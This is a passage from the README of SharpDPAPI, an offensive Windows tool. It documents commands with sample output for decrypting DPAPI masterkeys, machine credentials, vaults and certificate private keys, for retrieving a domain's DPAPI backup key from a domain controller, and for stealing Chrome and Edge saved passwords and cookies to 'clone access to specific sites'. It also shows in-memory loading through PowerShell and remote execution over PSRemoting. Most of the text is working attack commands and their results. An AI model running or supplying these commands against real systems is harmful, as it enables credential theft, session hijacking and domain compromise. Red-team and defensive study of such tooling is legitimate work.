Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da
Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=harmj0y
Valid Date : 2/22/2021 2:19:02 PM
Expiry Date : 2/22/2022 2:19:02 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Secure Email (1.3.6.1.5.5.7.3.4)
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
[*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...
-----END CERTIFICATE-----
The triage command runs the user credentials, vaults, rdg, and certificates commands.
The machinemasterkeys command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. It will return a set of masterkey {GUID}:SHA1 mappings.
Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).
C:\Temp>SharpDPAPI.exe machinemasterkeys
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Masterkey File Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
The machinecredentials command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Credential files.
Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).
C:\Temp>SharpDPAPI.exe machinecredentials
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Credential Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging System Credentials
Folder : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : C73A55F92FAE222C18A8989FEA28A1FE
guidMasterKey : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
size : 544
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description : Local Credential Data
LastWritten : 3/24/2019 7:08:43 PM
TargetName : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
TargetAlias :
Comment :
UserName : TESTLAB\harmj0y
Credential : Password123!
Folder : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials
CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D
...(snip)...
The machinevaults command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Vaults.
Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).
C:\Temp>SharpDPAPI.exe machinevaults
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Vault Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging SYSTEM Vaults
[*] Triaging Vault folder: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {0bd732d9-c396-4f9a-a69a-508632c05235}
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description :
aes128 key : 74CE3D7BCC4D0C4734931041F6D00D09
aes256 key : B497F57730A2F29C3533B76BD6B33EEA231C1F51ED933E0CA1210B9E3A16D081
...(snip)...
The certificates /machine command will use the machine certificate store to look for decryptable machine certificate private keys. /mkfile:X
and {GUID}:masterkey
are usable with the /target:\[file|folder\]
command, otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine system encrypted DPAPI private certificate keys.
By default, only private keys linkable to an associated installed certificate are displayed. The /showall
command will display ALL decrypted private keys.
Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).
C:\Temp>SharpDPAPI.exe certificates /machine
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...
[*] Triaging System Certificates
Folder : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
File : 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
Master Key GUID : {f12f57e1-dd41-4daa-88f1-37a64034c7e9}
Description : CryptoAPI Private Key
algCrypt : CALG_3DES (keyLen 192)
algHash : CALG_SHA (32772)
Salt : aa8c9e4849455660fc5fc96589f3e40e
HMAC : 9138559ef30fbd70808dca2c1ed02a29
Unique Name : te-Machine-50500b00-fddb-4a0d-8aa6-d73404473650
Thumbprint : A82ED8207DF6BC16BB65BF6A91E582263E217A4A
Issuer : CN=theshire-DC-CA, DC=theshire, DC=local
Subject : CN=dev.theshire.local
Valid Date : 2/22/2021 3:50:43 PM
Expiry Date : 2/22/2022 3:50:43 PM
Enhanced Key Usages:
Client Authentication (1.3.6.1.5.5.7.3.2)
[!] Certificate is used for client auth!
Server Authentication (1.3.6.1.5.5.7.3.1)
[*] Private key file 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzRX2ipgM1t9Et4KoP...(snip)...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIFOjCCBCKgAwIBAgITVQAAAJqDK8j15...(snip)...
-----END CERTIFICATE-----
The machinetriage command runs the user machinecredentials, machinevaults, and certificates /machine commands.
The ps command will describe/decrypt an exported PSCredential clixml. A /target:FILE.xml
must be supplied.
The command will a) decrypt the file with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The /unprotect
flag will use CryptUnprotectData() to decrypt the credenial .xml without masterkeys needed, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
Decrypt an exported credential .xml using CryptProtectData() (the /unprotect
flag):
PS C:\Temp> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\Temp> New-Object System.Management.Automation.PSCredential('TESTLAB\user', $SecPassword) | Export-CLIXml C:\Temp\cred.xml
PS C:\Temp> .\SharpDPAPI.exe ps /target:C:\Temp\cred.xml /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe PSCredential .xml
CredFile : C:\Temp\cred.xml
Accessed : 7/25/2019 11:53:09 AM
Modified : 7/25/2019 11:53:09 AM
User Name : TESTLAB\user
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 170
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Password : Password123!
Using domain {GUID}:SHA1 masterkey mappings:
PS C:\Temp> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\Temp> New-Object System.Management.Automation.PSCredential('TESTLAB\user', $SecPassword) | Export-CLIXml C:\Temp\cred.xml
PS C:\Temp> .\SharpDPAPI.exe ps /target:C:\Temp\cred.xml "{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3"
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe PSCredential .xml
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3
CredFile : C:\Temp\cred.xml
Accessed : 7/25/2019 12:04:12 PM
Modified : 7/25/2019 12:04:12 PM
User Name : TESTLAB\user
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 170
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Password : Password123!
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
PS C:\Temp> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\Temp> New-Object System.Management.Automation.PSCredential('TESTLAB\user', $SecPassword) | Export-CLIXml C:\Temp\cred.xml
PS C:\Temp> .\SharpDPAPI.exe ps /target:C:\Temp\cred.xml /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe PSCredential .xml
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3
CredFile : C:\Temp\cred.xml
Accessed : 7/25/2019 12:04:12 PM
Modified : 7/25/2019 12:04:12 PM
User Name : TESTLAB\user
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 170
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
Password : Password123!
The blob command will describe/decrypt a DPAPI blob. A /target:<BASE64|blob.bin>
must be supplied.
The command will a) decrypt the blob with any "{GUID}:SHA1" masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
The /unprotect
flag will use CryptUnprotectData() to decrypt the blob without masterkeys needed, if the command is run from the user context who saved the passwords. This can be done from an unprivileged context, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.
Decrypt a blob using CryptProtectData() (the /unprotect
flag):
C:\Temp>SharpDPAPI.exe blob /target:C:\Temp\blob.bin /unprotect
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe DPAPI blob
[*] Using CryptUnprotectData() for decryption.
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 170
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
dec(blob) : Password123!
Using domain {GUID}:SHA1 masterkey mappings:
C:\Temp>SharpDPAPI.exe blob /target:C:\Temp\blob2.bin {0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe DPAPI blob
[*] Using CryptUnprotectData() for decryption.
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 314
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...
Using a domain DPAPI backup key to first decrypt any discoverable masterkeys:
C:\Temp>SharpDPAPI.exe blob /target:C:\Temp\blob2.bin /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.5.0
[*] Action: Describe DPAPI blob
[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!
[*] User master key cache:
{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3
guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}
size : 314
flags : 0x0
algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
description :
dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...
The backupkey command will retrieve the domain DPAPI backup key from a domain controller using the LsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key blobs for any user on the domain. And even better, the key never changes ;)
Domain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.
The /nowrap
flag will prevent wrapping the base64 key on display.
This base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey /in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys, credentials, or vault SharpDPAPI commands.
By default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A server can be specified with /server:COMPUTER.domain.com
. If you want the key saved to disk instead of output as a base64 blob, use /file:key.pvk
.
Retrieve the DPAPI backup key for the current domain controller:
C:\Temp>SharpDPAPI.exe backupkey
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Retrieve domain DPAPI backup key
[*] Using current domain controller : PRIMARY.testlab.local
[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Key :
HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA...(snip)...
Retrieve the DPAPI backup key for the specified DC, outputting the backup key to a file:
C:\Temp>SharpDPAPI.exe backupkey /server:primary.testlab.local /file:key.pvk
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Retrieve domain DPAPI backup key
[*] Using server : primary.testlab.local
[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8
[*] Backup key written to : key.pvk
The search command will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs. Usage:
SharpDPAPI.exe search /type:registry [/path:HKLM\path\to\key] [/showErrors]
SharpDPAPI.exe search /type:folder /path:C:\path\to\folder [/maxBytes:<numOfBytes>] [/showErrors]
SharpDPAPI.exe search /type:file /path:C:\path\to\file [/maxBytes:<numOfBytes>]
SharpDPAPI.exe search /type:base64 [/base:<base64 string>]
The search
command works by searching for the following bytes, which represent the header (Version + DPAPI provider GUID) of DPAPI blob structure:
0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01, 0x15, 0xD1, 0x11, 0x8C, 0x7A, 0x00, 0xC0, 0x4F, 0xC2, 0x97, 0xEB
The search command has different arguments depending on the data type being scanned. To designate the data type, use the /type
argument specifying registry
, folder
, file
, or base64
. If the /type
argument is not present, the command will search the registry by default.
When searching the registry with no other arguments, the command will recursively search the HKEY_LOCAL_MACHINE and HKEY_USERS hives. Use /path
parameter to specify a root to key to search from (e.g. /path:HKLM\Software
) and use the /showErrors
argument to display errors that occuring during enumeration.
When searching a file or folder, specify a path with /path:C:\Path\to\file\or\folder
and optionally use /maxBytes:<int>
to specify the number of bytes to read from each file (default: 1024 bytes). The command will read the bytes from the beginning of the file and search for DPAPI blobs. Use /showErrors
to display an errors that occur during enumeration.
When searching a base64 blob, specify the base64-encoded bytes to scan with the /base64:<base64 str>
parameter.
If elevated on a machine that is an SCCM client, if the SCCM environment is configured with a Network Access Account (NAA), the system master key-protected DPAPI blobs containing the NAA credentials can be retrieved via WMI; The SCCM command will query the blobs via WMI, retrieve the system master keys, and decrypt the blobs.
The logins command will search for Chrome 'Login Data' files and decrypt the saved login passwords. If execution is in an unelevated contect, CryptProtectData() will automatically be used to try to decrypt values. If /browser:edge
is specified, the newer Chromium-based Edge browser is triaged.
Login Data files can also be decrypted with a) any "{GUID}:SHA1 {GUID}:SHA1 ..." masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys, or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
A specific Login Data file can be specified with /target:FILE
. A remote /server:SERVER
can be specified if a /pvk
or /password
is also supplied. If triaging newer Chrome/Edge instances, a /statekey:X
AES state key can be specified.
By default, logins are displayed in a csv format. This can be modified with /format:table
for table output. Also, by default only non-null password value entries are displayed, but all values can be displayed with /showall
.
If run from an elevated context, Login Data files for ALL users will be triaged, otherwise only Login Data files for the current user will be processed.
The cookies command will search for Chromium 'Cookies' files and decrypt cookie values. If execution is in an unelevated contect, CryptProtectData() will automatically be used to try to decrypt values. You can change the target application using the /browser:<VALUE>
(e.g., edge, brave, slack).
Cookie files can also be decrypted with a) any "{GUID}:SHA1 {GUID}:SHA1 ..." masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys, or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
A specific Cookies file can be specified with /target:FILE
. A remote /server:SERVER
can be specified if a /pvk
or /password
is also supplied. If triaging newer Chrome/Edge instances, a /statekey:X
AES state key can be specified.
By default, cookies are displayed in a csv format. This can be modified with /format:table
for table output, or /format:json
for output importable by EditThisCookie. Also, by default only non-expired cookie value entries are displayed, but all values can be displayed with /showall
.
If run from an elevated context, Cookie files for ALL users will be triaged, otherwise only Cookie files for the current user will be processed.
The cookies command also has /cookie:REGEX
and /url:REGEX
arguments to only return cookie names or urls matching the supplied regex. This is useful with /format:json
to easily clone access to specific sites.
By default, the statekeys command will search for Chromium-based applications (Google Chrome, Edge, Brave, and Slack), locate their AES statekey files (e.g., 'AppData\Local\Google\Chrome\User Data\Local State' and 'AppData\Local\Microsoft\Edge\User Data\Local State'), and decrypt them using the same type of arguments that can be supplied for cookies
and logins
. You may also supply the path to a specific state-key file using the /target:
parameter (e.g., "/target:C:\Users\Test\appdata\Local\Google\Chrome\User Data\Local State"
).
State keys can also be decrypted with a) any "{GUID}:SHA1 {GUID}:SHA1 ..." masterkeys passed, b) a /mkfile:FILE
of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key (/pvk:BASE64...
or /pvk:key.pvk
) to first decrypt any user masterkeys, or d) a /password:X
to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi
command.
If run from an elevated context, state keys for ALL users will be triaged, otherwise only state keys for the current user will be processed.
The backupkey command will retrieve the domain DPAPI backup key from a domain controller using the LsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key blobs for any user on the domain. And even better, the key never changes ;)
Domain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.
The /nowrap
flag will prevent wrapping the base64 key on display.
This base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey /in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys, credentials, or vault SharpDPAPI commands.
By default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A server can be specified with /server:COMPUTER.domain.com
. If you want the key saved to disk instead of output as a base64 blob, use /file:key.pvk
.
We are not planning on releasing binaries for SharpDPAPI, so you will have to compile yourself :)
SharpDPAPI has been built against .NET 3.5 and is compatible with Visual Studio 2019 Community Edition. Simply open up the project .sln, choose "Release", and build.
SharpDPAPI's default build configuration is for .NET 3.5, which will fail on systems without that version installed. To target SharpDPAPI for .NET 4 or 4.5, open the .sln solution, go to Project -> SharpDPAPI Properties and change the "Target framework" to another version.
If you want to run SharpDPAPI in-memory through a PowerShell wrapper, first compile the SharpDPAPI and base64-encode the resulting assembly:
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\SharpDPAPI.exe")) | Out-File -Encoding ASCII C:\Temp\SharpDPAPI.txt
SharpDPAPI can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded SharpDPAPI assembly string):
$SharpDPAPIAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
The Main() method and any arguments can then be invoked as follows:
[SharpDPAPI.Program]::Main("machinemasterkeys")
Due to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, SharpDPAPI has a function to help with that.
If you follow the instructions in Sidenote: Running SharpDPAPI Through PowerShell to create a SharpDPAPI.ps1, append something like the following to the script:
[SharpDPAPI.Program]::MainString("machinemasterkeys")
You should then be able to run SharpDPAPI over PSRemoting with something like the following:
$s = New-PSSession dc.theshire.local
Invoke-Command -Session $s -FilePath C:\Temp\SharpDPAPI.ps1
Alternatively, SharpDPAPI /consoleoutfile:C:\FILE.txt
argument will redirect all output streams to the specified file.